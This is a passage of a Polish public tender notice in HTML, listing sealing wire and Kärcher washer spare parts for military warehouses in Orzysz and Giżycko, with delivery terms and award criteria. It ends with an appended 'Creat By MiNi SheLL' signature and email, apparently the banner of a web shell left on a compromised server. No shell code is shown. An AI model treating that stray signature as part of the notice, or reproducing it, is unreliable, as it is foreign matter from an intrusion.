14	Drut do plomb w odcinkach 300mm
Dostawa do magazynu:
- SUiE w Orzyszu	kg	135
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39200000-4, 19500000-1,
                    34900000-6,
                    44100000-1,
                    44500000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji</td><td>30</td></tr><tr><td>Okres gwarancji</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin wykonania zamówienia uzależniony będzie od treści złożonej oferty (od 14 do 21 dni od dnia podpisania umowy)<br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>CZĘŚCI ZAMIENNE DO MYJNI POJAZDÓW<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Pistolet myjki KARCHER (4.775-463.0) - lub równoważny 
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	szt	8
2	Pistolet myjki KARCHER (6.392-210.0) - lub równoważny
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	szt	8
3	Lanca spryskująca KARCHER (4.760-584.0) - lub równoważny
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	szt	16
4	Szybkozłącze KARCHER (6.401-417.0) - lub równoważny
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	szt	16
5	Wkrętka do lancy KARCHER (6.401-417.0) - lub równoważny
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	szt	16
6	Filtr do odkurzacza KARCHER (6.907-276.0) - lub równoważny
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	szt	5
7	Worek do odkurzacza KARCHER (6.904-285.0) - lub równoważny
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	szt	30
8	Dysza rotacyjna KARCHER (4.763-931.0) - lub równoważny
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	szt	20
9	Dysza 25100 KARCHER (2.883-408.0) - lub równoważny
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	szt	20
10	Złącze dysz KARCHER (5.401-210.0) - lub równoważny
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	szt	20
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34900000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin wykonania zamówienia uzależniony będzie od treści złożonej oferty (od 14 do 21 dni od dnia podpisania umowy)<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com